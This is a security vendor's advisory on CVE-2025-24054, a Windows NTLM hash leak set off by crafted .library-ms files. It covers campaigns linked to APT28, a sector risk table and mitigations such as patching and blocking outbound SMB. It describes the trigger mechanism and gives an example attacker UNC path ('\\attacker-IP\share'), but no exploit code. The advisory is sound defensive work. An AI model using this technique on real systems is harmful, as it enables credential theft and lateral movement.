BlackCloak Knowledge Base
Protect Your Digital Life ™
In this article
CISO Monthly: NTLM Hash Theft Under Active ExploitationCampaign IntelligenceSector-Specific Risk AssessmentImmediate CISO Mitigation Strategy
Home
White Papers & Reports
From the Desk of the CISO
2026

April Cloaked in Security

Edited

CISO Monthly: NTLM Hash Theft Under Active Exploitation

Issue: April 2026

Recent intelligence from Check Point Research has confirmed that CVE-2025-24054, a Windows NTLM hash disclosure spoofing vulnerability, is being actively weaponized by threat actors. While initially categorized as "exploitation less likely" by Microsoft, over 10 distinct campaigns have been observed since March 2025 targeting government and private institutions.

Threat Profile: CVE-2025-24054

This vulnerability allows unauthorized attackers to leak NTLMv2-SSP hashes (also known as Net-NTLMv2) without requiring the victim to open or execute a malicious file.

  • The Trigger Mechanism: The attack leverages specially crafted .library-ms files, which are XML-based descriptor files for Windows Libraries.

  • Minimal Interaction Required: Exploitation can be triggered by a single-click (selection), right-click (inspection), or simply navigating to the folder containing the file in Windows Explorer.

  • The Process: As soon as Windows handles the file, it automatically attempts to connect to a remote UNC path (e.g., \\attacker-IP\share) specified inside the file. This triggers an SMB authentication request that transmits the user's NTLM hash to the attacker’s server.

  • Historical Variant: This vulnerability is considered a variant of CVE-2024-43451, which was previously exploited as a zero-day against Ukrainian entities.

Campaign Intelligence

Targeted attacks were first identified in mid-March 2025 against entities in Poland and Romania.

  • Delivery: Phishing emails contained Dropbox links to ZIP archives.

  • Attribution: One malicious SMB server involved in the campaign has been previously linked to APT28 (Fancy Bear/Forest Blizzard).

  • Global Reach: Later campaigns in March 2025 were observed targeting enterprise users globally with uncompressed files named "Info.doc.library-ms".

(Please turn mobile devices horizontally to view chart)

Sector-Specific Risk Assessment

Domain

Observed Risk Metrics

Recommended Pivot

NFP, Government, & Consulting

High Criticality: Primary targets of current APT-led hash harvesting campaigns.

Prioritize patching for all workstations and enforce strict email filtering for .library-ms attachments.

Financial Services

Elevated Risk: Susceptible to NTLM relay attacks for unauthorized lateral movement in high-value environments.

Enable SMB signing and NTLM relay protections to mitigate the impact of stolen hashes.

Technology & Software

Targeted: Active campaigns delivering malicious library files directly via social engineering.

Block outbound SMB traffic (Port 445) at the firewall to prevent hashes from leaving the perimeter.

Manufacturing & Energy

Vulnerable: Legacy systems in these sectors often rely on NTLMv2 for internal authentication.

Conduct an audit of NTLM usage and move toward Kerberos-only authentication where possible.

Biotech & Healthcare

Critical: High risk of lateral movement if administrative hashes are leaked.

Monitor SearchProtocolHost.exe for suspicious outbound connections to unfamiliar UNC paths.

Immediate CISO Mitigation Strategy

  1. Mandatory Patching: Ensure the March 2025 Windows Security updates (or later) are applied immediately to all supported Windows and Windows Server versions.

  2. Micropatching: For unsupported legacy systems (e.g., Windows 7, Server 2008 R2), utilize micropatching solutions to address the flaw.

  3. Firewall Hardening: Block all outbound SMB traffic (Port 445) to the internet to disrupt the attacker's ability to receive leaked hashes.

  4. Endpoint Monitoring: Monitor for unusual activity in Windows Explorer or the creation of .library-ms files in temporary directories.


BlogContact UsGo to BlackCloak.io